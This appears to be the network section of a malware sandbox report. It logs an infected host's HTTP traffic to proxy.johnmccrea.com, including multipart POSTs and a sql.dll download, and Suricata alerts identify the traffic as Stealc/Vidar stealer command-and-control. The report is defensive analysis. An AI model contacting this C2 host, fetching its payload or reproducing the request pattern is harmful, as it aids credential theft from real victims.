Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| proxy.johnmccrea.com | 141.98.233.156 |
GET
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Host: proxy.johnmccrea.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:35:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGDHDHJEBGHJKFIECBGC
Host: proxy.johnmccrea.com
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:35:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEHIIDGCFHIEGDGCBFHD
Host: proxy.johnmccrea.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:35:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDB
Host: proxy.johnmccrea.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:35:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KECGHIJDGCBKECAAKKEC
Host: proxy.johnmccrea.com
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:35:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKEBKJJDGHCBGCAAKEHD
Host: proxy.johnmccrea.com
Content-Length: 4313
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:35:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://proxy.johnmccrea.com//sql.dll
REQUEST
RESPONSE
BODY
GET //sql.dll HTTP/1.1
Host: proxy.johnmccrea.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:35:22 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT
Connection: keep-alive
ETag: "6560a86a-258600"
Accept-Ranges: bytes
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHI
Host: proxy.johnmccrea.com
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:35:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49165 -> 141.98.233.156:80 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | A Network Trojan was detected |
| TCP 141.98.233.156:80 -> 192.168.56.103:49165 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | Malware Command and Control Activity Detected |
| TCP 141.98.233.156:80 -> 192.168.56.103:49165 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | Malware Command and Control Activity Detected |
| TCP 141.98.233.156:80 -> 192.168.56.103:49166 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 141.98.233.156:80 -> 192.168.56.103:49166 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts